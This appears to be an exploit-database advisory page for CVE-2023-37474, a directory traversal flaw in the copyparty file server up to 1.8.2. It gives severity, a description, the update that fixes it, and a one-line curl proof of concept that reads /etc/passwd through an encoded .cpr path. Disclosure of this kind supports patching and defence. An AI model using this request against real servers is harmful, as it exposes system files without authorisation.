copyparty 1.8.2 - Directory Traversal

vendor:

copyparty

by:

Vartamtzidis Theodoros

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: copyparty

Affected Version From: 1

Affected Version To: 1.8.2002

Patch Exists: YES

Related CWE: CVE-2023-37474

CPE: a:copyparty_project:copyparty:1.8.2

Metasploit:

Other Scripts:

Platforms Tested: Debian Linux

2023

copyparty 1.8.2 – Directory Traversal

Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory.

Mitigation:

Update to version 1.8.2 or later.

Source

Exploit-DB raw data:

# Exploit Title: copyparty 1.8.2 - Directory Traversal
# Date: 14/07/2023
# Exploit Author: Vartamtzidis Theodoros (@TheHackyDog)
# Vendor Homepage: https://github.com/9001/copyparty/
# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.2
# Version: <=1.8.2
# Tested on: Debian Linux
# CVE : CVE-2023-37474




#Description
Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory.

#POC
curl -i -s -k -X  GET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'